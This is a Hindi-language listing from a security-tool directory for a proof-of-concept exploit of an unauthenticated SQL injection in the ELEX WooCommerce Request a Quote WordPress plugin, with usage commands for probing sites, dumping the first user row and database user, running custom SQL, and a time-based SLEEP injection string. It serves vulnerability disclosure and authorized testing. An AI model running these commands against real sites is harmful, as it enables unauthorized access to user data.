Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-14962 — Wordpress Plugin ELEX WooCommerce Request a Quote unauthenticated SQL injection POC | Kitploit
उपकरण/GitHubGitHub/cflowsec/cve-2026-14962
Vulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubcflowsec/cve-2026-14962

CVE-2026-14962

Wordpress Plugin ELEX WooCommerce Request a Quote unauthenticated SQL injection POC

रिपॉजिटरी देखें
920 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-14962

Wordpress Plugin ELEX WooCommerce Request a Quote अनधिकृत SQL इंजेक्शन

ELEX WooCommerce Request a Quote (WordPress plugin elex-request-a-quote) ≤ 2.4.0 — सार्वजनिक elex_raq_add_to_quote AJAX action के माध्यम से अनधिकृत SQL इंजेक्शन।

केवल अधिकृत परीक्षण के लिए। इसे उन सिस्टमों के विरुद्ध न चलाएँ जिनके आप स्वामी नहीं हैं या जिनका परीक्षण करने की अनुमति आपके पास नहीं है।

आवश्यक: Python 3, केवल मानक लाइब्रेरी। लक्ष्य पर WooCommerce चल रहा होना चाहिए (quote scripts/nonce shop/home पृष्ठ पर प्रिंट होते हैं)।

python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --test
python3 cve-2026-14962-elex-raq-sqli.py -u https://TARGET --test --insecure
python3 cve-2026-14962-elex-raq-sqli.py -u TARGET --test
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --dump
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --dump --pid 11
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --sleep 3
python3 cve-2026-14962-elex-raq-sqli.py -u http://TARGET --sql 'OR JSON_ARRAY(SLEEP(3)))#'
Flagयह क्या करता है
-u / --urlWordPress साइट रूट (आवश्यक)। http:// या https://; होस्टनेम को पहले HTTPS के रूप में आज़माया जाता है, फिर HTTP। Self-signed TLS स्वतः पुनः प्रयास किया जाता है। --insecure शुरू से ही verify छोड़ देता है
--testGuest: plugin संस्करण + सार्वजनिक nonce, फिर एक गैर-विनाशकारी $0 SQL प्रोब
--dumpपहली wp_users पंक्ति + DB user। WP_DEBUG आवश्यक है ताकि XPATH त्रुटि HTTP body में हो
--query SQLआपका स्वयं का SQL expression (single quotes नहीं; strings के लिए 0x… hex का उपयोग करें)
--sql EXPR$0$0 breakout के बाद कच्चा data[id] (आप ) OR … # gadget लिखते हैं)
--sleep Nसमय-आधारित SLEEP(N) प्रयास
--pid / --vidWooCommerce product / variation ids (sink तक पहुँचने के लिए variation रिक्त नहीं होना चाहिए)
--insecureTLS verify छोड़ें
--timeoutHTTP timeout सेकंड (डिफ़ॉल्ट 30)

अनधिकृत। nonce / और /shop/ पर request_a_quote_ajax_obj में प्रिंट होता है। guest cookie request_a_quote_user_coockie है (plugin की वर्तनी)।

--test attribute_value=$0 POST करता है। Vulnerable 2.4.0 preg_replace $0 को %s मैच मानता है और query में एक literal %d छोड़ देता है। 2.4.1 JSON_CONTAINS को bind करता है और $0 केवल एक JSON मान होता है।

Stdout: VERSION, NONCE, VULNERABLE, NOT_VULNERABLE, NOT_FOUND, NO_NONCE, NO_DUMP, SQLERR, SLEEP।

CVE: CVE-2026-14962। Plugin changelog 2.4.1।

Working PoC

टूल डाउनलोड करें